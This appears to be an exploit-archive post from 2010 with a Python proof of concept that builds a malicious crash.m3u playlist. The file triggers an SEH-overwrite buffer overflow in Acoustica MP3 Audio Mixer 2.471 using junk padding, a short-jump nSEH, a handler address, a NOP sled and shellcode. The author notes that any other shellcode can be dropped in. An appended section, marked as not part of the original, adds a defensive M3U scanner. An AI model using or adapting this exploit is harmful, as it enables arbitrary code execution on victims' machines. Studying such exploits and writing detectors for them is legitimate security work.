Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
Posted on 09 September 2010
# Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Date: September 8 2010
# Author: Carlos Hollmann
# Software Link: http://www.acoustica.com/downloading.asp?p=1
# Version: 2.471
# Tested on: Windows XP SP3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
# CVE :
# COLOMBIA presents.............
# PoC from D3V!L FucK3r http://www.exploit-db.com/exploits/9213/
#
# Carlos Mario Penagos Hollmann A.K.A Elvenking shogilord@gmail.com
# Extended M3U directives
# Background from http://hanna.pyxidis.org/tech/m3u.html
# The software doesn't correctly handle the M3U header and extra info when a playlist is imported into an open sound group.
# Trigger: launch the app, open an existing sound group, i.e. (C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp), then import crash.m3u and....KaaaaBooom!!
#
#
# Greetings: My Family, Algeria-->sud0, Australia-->tecr0c, Peru-->fataku, Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia
# !!! PEACE FOR MY COUNTRY, PEACE FOR COLOMBIA !!! Freedom!!
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# I do not want anyone to use this script
# for malicious and/or illegal purposes
# I cannot be held responsible for any illegal use.
# Note : you are not allowed to edit/modify this code.
# If you do, I will not be held responsible for any damages this may cause.
#!/usr/bin/python
magic = "crash.m3u"
vuln = "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINFO, can change 0D for any value \x1b,\x0a.........
junk = "\x41" * 816
ds_eax = "\x25\x25\x47\x7E" # First Call ds:[eax+8], writeable memory address to put in EAX
morejunk = "\x42" * 8308
nSEH = "\xEB\x06\x90\x90" # short jmp 6 bytes
SEH = "\x3F\x28\xD1\x72" # SEH Handler
nops = "\x90" * 10 # landing pad
shellcode = "\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thanks sud0, any other shell works too, just remove "\x00\x0a"
payload = vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode
file = open(magic , 'w')
file.write(payload)
file.close()

# Inj3ct0r.com [2010-09-09]
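
A defender-side check for the malformed input described above, as an added example that is not part of the original advisory: it flags playlist files with bare or unknown '#' lines, oversized lines or control bytes before they reach an importer. The 1024-byte limit, the function name inspect_m3u and both sample inputs are assumptions constructed for illustration.

```python
# Added example (Python 3), not from the original advisory: triage M3U playlists before import.
import re
import sys

MAX_LINE = 1024  # assumed limit; playlist entries are paths or URLs and are far shorter
KNOWN_DIRECTIVES = (b"#EXTM3U", b"#EXTINF:")  # the two Extended M3U directives
# Control bytes other than TAB, CR and LF. Bytes above 0x7f are not flagged on
# their own because legitimate file names may be Latin-1 or UTF-8 encoded.
NON_TEXT = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def inspect_m3u(data):
    """Return a list of (line_number, reason) findings for raw playlist bytes."""
    findings = []
    for number, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if line.startswith(b"#") and not line.startswith(KNOWN_DIRECTIVES):
            # Heuristic: plain comments are legal M3U, so treat this as low severity.
            findings.append((number, "'#' line is not #EXTM3U or #EXTINF"))
        if len(line) > MAX_LINE:
            findings.append((number, "line of %d bytes exceeds %d" % (len(line), MAX_LINE)))
        if NON_TEXT.search(line):
            findings.append((number, "control bytes in a text playlist"))
    return findings


# Constructed samples: a normal Extended M3U file and an inert file with the same
# shape as the advisory's input (bare '#' lines followed by one very long line).
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Artist - Title\r\nC:\\Music\\track01.mp3\r\n"
SUSPECT = b"#\r\n#\r\n" + b"A" * 9000 + b"\x01\x02\r\n"

if __name__ == "__main__":
    # With file arguments, scan those files; otherwise scan the constructed samples.
    if len(sys.argv) > 1:
        samples = [(path, open(path, "rb").read()) for path in sys.argv[1:]]
    else:
        samples = [("BENIGN", BENIGN), ("SUSPECT", SUSPECT)]
    for name, data in samples:
        for number, reason in inspect_m3u(data):
            print("%s:%d: %s" % (name, number, reason))
```
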